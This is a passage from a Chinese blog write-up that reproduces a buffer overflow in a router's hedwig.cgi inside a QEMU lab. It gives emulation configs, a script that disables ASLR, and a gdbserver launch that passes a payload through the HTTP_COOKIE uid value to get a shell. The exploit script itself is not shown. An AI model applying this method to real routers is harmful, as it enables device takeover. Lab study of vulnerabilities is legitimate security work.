</span></span><span style="display:flex;"><span>    ServerName <span style="color:#e6db74">&#34;Linux, HTTP/1.1, &#34;</span>
</span></span><span style="display:flex;"><span>    ServerId <span style="color:#e6db74">&#34;1234&#34;</span>
</span></span><span style="display:flex;"><span>    Family inet
</span></span><span style="display:flex;"><span>    Interface eth0 <span style="color:#960050;background-color:#1e0010">#对应</span>qemu仿真路由器系统的网卡
</span></span><span style="display:flex;"><span>    Address <span style="color:#ae81ff">192.168.182.6</span> <span style="color:#960050;background-color:#1e0010">#</span>qemu仿真路由器系统的IP
</span></span><span style="display:flex;"><span>    Port <span style="color:#e6db74">&#34;1234&#34;</span> <span style="color:#960050;background-color:#1e0010">#对应未被使用的端口</span>
</span></span><span style="display:flex;"><span>    Virtual
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        AnyHost
</span></span><span style="display:flex;"><span>        Control
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            Alias <span style="color:#f92672">/</span>
</span></span><span style="display:flex;"><span>            Location <span style="color:#f92672">/</span>htdocs<span style="color:#f92672">/</span>web
</span></span><span style="display:flex;"><span>            IndexNames { index.php }
</span></span><span style="display:flex;"><span>            External
</span></span><span style="display:flex;"><span>            {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">/</span>usr<span style="color:#f92672">/</span>sbin<span style="color:#f92672">/</span>phpcgi { router_info.xml }
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">/</span>usr<span style="color:#f92672">/</span>sbin<span style="color:#f92672">/</span>phpcgi { post_login.xml }
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        Control
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            Alias <span style="color:#f92672">/</span>HNAP1
</span></span><span style="display:flex;"><span>            Location <span style="color:#f92672">/</span>htdocs<span style="color:#f92672">/</span>HNAP1
</span></span><span style="display:flex;"><span>            External
</span></span><span style="display:flex;"><span>            {
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">/</span>usr<span style="color:#f92672">/</span>sbin<span style="color:#f92672">/</span>hnap { hnap }
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>            IndexNames { index.hnap }
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h5 id="324开启物理机转发功能">3.2.4开启物理机转发功能</h5>
<p>在宿主机中新建以下net_conf_host.sh脚本并执行：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#! /bin/sh
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>sudo sysctl -w net.ipv4.ip_forward<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>sudo iptables -F
</span></span><span style="display:flex;"><span>sudo iptables -X
</span></span><span style="display:flex;"><span>sudo iptables -t nat -F
</span></span><span style="display:flex;"><span>sudo iptables -t nat -X
</span></span><span style="display:flex;"><span>sudo iptables -t mangle -F
</span></span><span style="display:flex;"><span>sudo iptables -t mangle -X
</span></span><span style="display:flex;"><span>sudo iptables -P INPUT ACCEPT
</span></span><span style="display:flex;"><span>sudo iptables -P FORWARD ACCEPT
</span></span><span style="display:flex;"><span>sudo iptables -P OUTPUT ACCEPT
</span></span><span style="display:flex;"><span>sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE
</span></span><span style="display:flex;"><span>sudo iptables -I FORWARD <span style="color:#ae81ff">1</span> -i tap0 -j ACCEPT
</span></span><span style="display:flex;"><span>sudo iptables -I FORWARD <span style="color:#ae81ff">1</span> -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT
</span></span></code></pre></div><p>之后，再在qemu虚拟机的squashfs-root目录下创建init.sh的脚本进行初始化操作：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>echo <span style="color:#ae81ff">0</span> &gt; /proc/sys/kernel/randomize_va_space
</span></span><span style="display:flex;"><span>cp http_conf /
</span></span><span style="display:flex;"><span>cp sbin/httpd /
</span></span><span style="display:flex;"><span>cp -rf htdocs/ /
</span></span><span style="display:flex;"><span>mkdir /etc_bak
</span></span><span style="display:flex;"><span>cp -r /etc /etc_bak
</span></span><span style="display:flex;"><span>rm /etc/services
</span></span><span style="display:flex;"><span>cp -rf etc/ /
</span></span><span style="display:flex;"><span>cp lib/ld-uClibc-0.9.30.1.so  /lib/
</span></span><span style="display:flex;"><span>cp lib/libcrypt-0.9.30.1.so  /lib/
</span></span><span style="display:flex;"><span>cp lib/libc.so.0  /lib/
</span></span><span style="display:flex;"><span>cp lib/libgcc_s.so.1  /lib/
</span></span><span style="display:flex;"><span>cp lib/ld-uClibc.so.0  /lib/
</span></span><span style="display:flex;"><span>cp lib/libcrypt.so.0  /lib/
</span></span><span style="display:flex;"><span>cp lib/libgcc_s.so  /lib/
</span></span><span style="display:flex;"><span>cp lib/libuClibc-0.9.30.1.so  /lib/
</span></span><span style="display:flex;"><span>cd /
</span></span><span style="display:flex;"><span>rm -rf /htdocs/web/hedwig.cgi
</span></span><span style="display:flex;"><span>rm -rf /usr/sbin/phpcgi
</span></span><span style="display:flex;"><span>rm -rf /usr/sbin/hnap
</span></span><span style="display:flex;"><span>ln -s /htdocs/cgibin /htdocs/web/hedwig.cgi
</span></span><span style="display:flex;"><span>ln -s /htdocs/cgibin /usr/sbin/phpcgi
</span></span><span style="display:flex;"><span>ln -s  /htdocs/cgibin /usr/sbin/hnap
</span></span><span style="display:flex;"><span>./httpd -f http_conf
</span></span></code></pre></div><p>通过以下命令切换根目录</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>mount -o bind /dev ./squashfs-root/dev/
</span></span><span style="display:flex;"><span>mount -t proc /proc/ ./squashfs-root/proc/
</span></span><span style="display:flex;"><span>chroot squashfs-root bash
</span></span></code></pre></div><p>但是squashfs-root目录下并无bash，静态编译一个mips架构的bash放进去。</p>
<p>如果报错没有PID文件，自己手动创建一个文件，只要PID不和已有的重复就行。</p>
<p>最后，启动init.sh脚本，开启httpd服务</p>
<p>此时在物理机中访问 qemu_IP/hedwig.cgi，如图：</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407121538462.png?x-oss-process=style/zzz" alt="image-20240712153756659"></p>
<p>出现上图，则说明配置成功。最后，退出qemu虚拟机的时候，运行fin.sh的脚本恢复/etc文件夹,否则后续qemu会打不开：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>rm -rf /etc
</span></span><span style="display:flex;"><span>mv /etc_bak/etc /etc
</span></span><span style="display:flex;"><span>rm -rf /etc_bak
</span></span></code></pre></div><h5 id="325-复现">3.2.5 复现</h5>
<p>​        在物理机上运行exp.py，将静态编译的gdbserver、生成的payload上传到qemu虚拟机中。</p>
<p>注：系统模式和用户模式的基址可能是不同的</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407171512946.png?x-oss-process=style/zzz" alt="image-20240717151234833"></p>
<p>执行以下脚本启动gdbserver调试</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>export CONTENT_LENGTH<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>export CONTENT_TYPE<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;application/x-www-form-urlencoded&#34;</span>
</span></span><span style="display:flex;"><span>export HTTP_COOKIE<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;uid=`cat payload`&#34;</span>
</span></span><span style="display:flex;"><span>export REQUEST_METHOD<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;POST&#34;</span>
</span></span><span style="display:flex;"><span>export REQUEST_URI<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/hedwig.cgi&#34;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;uid=1234&#34;</span>|./gdbserver.mipsle 192.168.182.12:6666 /htdocs/web/hedwig.cgi
</span></span><span style="display:flex;"><span><span style="color:#75715e">#unset CONTENT_LENGTH</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#unset CONTENT_TYPE</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#unset HTTP_COOKIE</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#unset REQUEST_METHOD</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#unset REQUEST_URI</span>
</span></span></code></pre></div><p>直接在虚拟机里启动该脚本，物理机启动一个端口监听，gdb连接上直接c即可获得shell</p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407171511288.png?x-oss-process=style/zzz" alt="image-20240717151127161"></p>
<p><img src="https://pic-one1.oss-cn-beijing.aliyuncs.com/typroa/202407171511236.png?x-oss-process=style/zzz" alt="image-20240717151147134"></p>
<h3 id="参考">参考</h3>
<p>[]: <a href="https://bbs.kanxue.com/thread-272318.htm#msg_header_h3_8">https://bbs.kanxue.com/thread-272318.htm#msg_header_h3_8</a>
[]: <a href="https://bbs.kanxue.com/thread-263758.htm">https://bbs.kanxue.com/thread-263758.htm</a></p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
